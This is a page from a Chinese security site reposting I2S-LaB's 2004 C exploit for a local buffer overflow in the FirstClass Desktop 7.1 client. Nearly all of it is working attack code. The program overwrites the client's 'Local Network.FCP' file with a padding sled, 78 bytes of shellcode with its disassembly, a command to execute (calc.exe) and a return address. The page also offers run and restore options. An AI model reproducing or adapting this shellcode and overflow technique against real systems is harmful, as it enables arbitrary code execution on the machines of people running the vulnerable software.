首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FirstClass Desktop 7.1 buffer overflow Exploit
来源:http://www.I2S-LaB.com 作者:I2S-LaB 发布时间:2004-04-12  

FirstClass Desktop 7.1 buffer overflow Exploit

/***********************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++
####################################################
# FirstClass Desktop 7.1 (latest) buffer overflow exploit #
####################################################
Discovered and coded by I2S-LaB.

URL : http://www.I2S-LaB.com
contact : contact[at]I2S-LaB.com

++++++++++++++++++++++++++++++++++++++++++++++++++++
Compile it with cl.exe (VC++6)
***********************************************************/

#include <windows.h>

void main (int argc, char *argv[])
{

HANDLE FCP;
DWORD NumberOfBytesWritten;
unsigned char *p,

FC_FILE[] = "Local Network.FCP",
PATH[] = "C:\\Program Files\\FirstClass\\Fcp\\",

rawData[] =

/////////////////////////////////////////////////////////////////
// FC file data
/////////////////////////////////////////////////////////////////
"\x43\x4F\x4E\x4E\x54\x59\x50\x45\x20\x3D\x20\x38\x0D\x0A\x46\x43"
"\x50\x45\x4E\x43\x52\x59\x50\x54\x20\x3D\x20\x31\x0D\x0A\x44\x4C"
"\x53\x45\x4E\x44\x20\x3D\x20\x30\x0D\x0A\x44\x4C\x45\x52\x52\x53"
"\x20\x3D\x20\x30\x0D\x0A\x44\x4C\x52\x43\x56\x20\x3D\x20\x30\x0D"
"\x0A\x4D\x44\x4D\x44\x42\x47\x20\x3D\x20\x30\x0D\x0A\x53\x4C\x44"
"\x42\x47\x20\x3D\x20\x30\x0D\x0A\x54\x43\x50\x54\x58\x57\x49\x4E"
"\x20\x3D\x20\x31\x30\x30\x30\x30\x0D\x0A\x54\x43\x50\x52\x58\x42"
"\x55\x46\x20\x3D\x20\x31\x30\x30\x30\x30\x0D\x0A\x54\x43\x50\x52"
"\x45\x4D\x50\x4F\x52\x54\x20\x3D\x20\x35\x31\x30\x0D\x0A\x50\x52"
"\x4F\x58\x59\x50\x4F\x52\x54\x20\x3D\x20\x22"

/////////////////////////////////////////////////////////////////
// MASS NOP LIKE : 'A' = inc ecx
/////////////////////////////////////////////////////////////////
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"


/*
* Fcclient Specific shellcode [78 bytes]
*****************************************************************
:00401006 EB47 jmp 0040104F
:00401008 5A pop edx
:00401009 33FF xor edi, edi
:0040100B 8BEC mov ebp, esp
:0040100D 57 push edi
:0040100E 52 push edx
:0040100F 57 push edi
:00401010 6845786563 push 63657845
:00401015 4F dec edi
:00401016 81EFFFA89691 sub edi, 9196A8FF
:0040101C 57 push edi
:0040101D 68454C3332 push 32334C45
:00401022 684B45524E push 4E52454B
:00401027 8D5DE4 lea ebx, dword ptr [ebp-1C]
:0040102A 53 push ebx
:0040102B 33FF xor edi, edi
:0040102D 81EF589D9DFF sub edi, FF9D9D58
:00401033 FF17 call dword ptr [edi]
:00401035 8D5DED lea ebx, dword ptr [ebp-13]
:00401038 53 push ebx
:00401039 50 push eax
:0040103A 6681F75103 xor di, 0351
:0040103F 4F dec edi
:00401040 FF17 call dword ptr [edi]
:00401042 6A01 push 00000001
:00401044 FF75F8 push [ebp-08]
:00401047 FFD0 call eax
:00401049 6683EF4C sub di, 004C
:0040104D FFD7 call edi
:0040104F E8B4FFFFFF call 00401008
**********************************************************
*
*/

"\xEB\x47\x5A\x33\xFF\x8B\xEC\x57\x52\x57\x68\x45\x78\x65\x63\x4F"
"\x81\xEF\xFF\xA8\x96\x91\x57\x68\x45\x4C\x33\x32\x68\x4B\x45\x52"
"\x4E\x8D\x5D\xE4\x53\x33\xFF\x81\xEF\x58\x9D\x9D\xFF\xFF\x17\x8D"
"\x5D\xED\x53\x50\x66\x81\xF7\x51\x03\x4F\xFF\x17\x6A\x01\xFF\x75"
"\xF8\xFF\xD0\x66\x83\xEF\x4C\xFF\xD7\xE8\xB4\xFF\xFF\xFF"

"calc.exe & " // to execute

////////////////////////////////////////////////////////////////
// OTHER DATA
////////////////////////////////////////////////////////////////
"\x22\x0A\x0D\x0A\x50\x52\x4F\x58\x59\x41\x44\x44\x52\x20"
"\x3D\x20\x22\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x45\x45\x45"
"\x45\x44\x44"

/////////////////////////////////////////////////////////////////
// Return Address
/////////////////////////////////////////////////////////////////
"\x5f\x75\xC2\x00";

// Banner
printf ("###############################################\n"
"FirstClass Client local buffer overflow Exploit\n"
"###############################################\n"
"Discovered & coded by I2S-LaB.\n\n"
"URL : http://www.I2S-LaB.com\n"
"MAIL : Contact[at]I2S-LaB.com\n\n");


if ( !argv[1]) argv[1] = FC_FILE;

(argc > 2 ) ? (p = argv[2]) : (p = PATH);

if ( !(SetCurrentDirectory( p ) ) )
{
printf ("cannot set current directory to %s\nexiting.\n", p);
ExitProcess(0);
}

if (!lstrcmpi (argv[1], "/restore") )

printf ("Restore the backup file...%s\n",
CopyFile ("Local Network.BAK", FC_FILE, FALSE) ? "ok" : "Error : backup file not found!\n");

else if ( !lstrcmpi (argv[1], "/run"))
{
printf ("Saving the Local Network file...%s\n",
CopyFile (FC_FILE, "Local Network.BAK", TRUE) ? "ok" : "Backup file cannot be made");


printf ("Opening the Local Network file...");
FCP = CreateFile (FC_FILE, GENERIC_WRITE,
FILE_SHARE_WRITE, NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,NULL);

if (FCP == INVALID_HANDLE_VALUE)
{
printf ("cannot open Local Network file, exiting!\n");
ExitProcess (-1);
}

printf ("ok\nWriting the Local Network File...%s\n",
WriteFile (FCP, rawData, strlen (rawData) + 1, &NumberOfBytesWritten, NULL) ? "ok" : "Write file error!");
}

else printf ("usage : %s /RUN | /RESTORE [path to Local Network.FCP]\n\n"
"/RUN : launch the xploit against \"Local Network.FCP\"\n"
"/RESTORE : Restore the previous \"Local Network.FCP\"\n\n"
"[path to Local Network.FCP] : Optional,\ndefine the path of the \"Local Network.FCP\" to exploit.\n"
"Default is %s\n", argv[0], PATH);
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Tcpdump ISAKMP Identification
·Panda ActiveScan Control Remot
·Multiple Cisco Products Vulner
·Monit <= 4.1 Remote Root Ex
·GV Local Buffer Overflow Explo
·Proof-of-concept exploit code
·BlackJumboDog FTP Server Buffe
·RogerWilco 0.4 remote exploit
·AOL Instant Messenger AIM Away
·Remote Exploit for Aborior's E
·Mac OS X<=10.3.3 AppleFileS
·Tcpdump ISAKMP payload Integer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved